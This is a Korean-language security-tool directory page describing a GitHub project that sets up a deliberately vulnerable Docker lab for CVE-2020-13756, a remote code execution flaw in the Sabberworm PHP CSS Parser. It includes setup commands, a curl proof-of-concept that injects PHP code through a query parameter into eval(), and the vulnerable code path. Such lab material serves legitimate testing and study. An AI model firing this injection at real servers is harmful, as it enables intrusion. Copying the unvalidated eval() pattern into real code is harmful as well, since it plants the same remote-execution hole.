Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-13756-env — CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)를 위한 취약한 테스트 환경 | Kitploit
도구/GitHubGitHub/kre80r/cve-2020-13756-env
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)를 위한 취약한 테스트 환경

저장소 보기
19개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-13756 취약 환경

CVE-2020-13756 - Sabberworm PHP CSS Parser 원격 코드 실행 취약 테스트 환경

취약점 세부 정보

FieldValue
CVECVE-2020-13756
ProductSabberworm PHP CSS Parser
Vulnerable Versions< 8.3.1
SeverityCritical (CVSS 9.8)
TypeRemote Code Execution

빠른 시작 (One-Liner)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

또는 클론하여 실행:

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

수동 설정

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

취약점 확인

root@kitploit:~
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

예상 출력은 시작 부분에 VULN_TEST를 포함하여 코드 실행을 증명합니다.

Nuclei로 테스트

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

기술적 세부 사항

취약점은 사용자 입력을 검증하지 않고 eval()에 전달하는 getSelectorsBySpecificity() 함수에 존재합니다:

root@kitploit:~
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

참고 자료

  • NVD
  • 수정 커밋
  • 전체 공개
  • PacketStorm

면책 조항

이 환경은 공인된 보안 테스트 전용입니다. 허가 없이 시스템에 사용하지 마십시오.

작성자

KrE80r - 보안 연구

도구 다운로드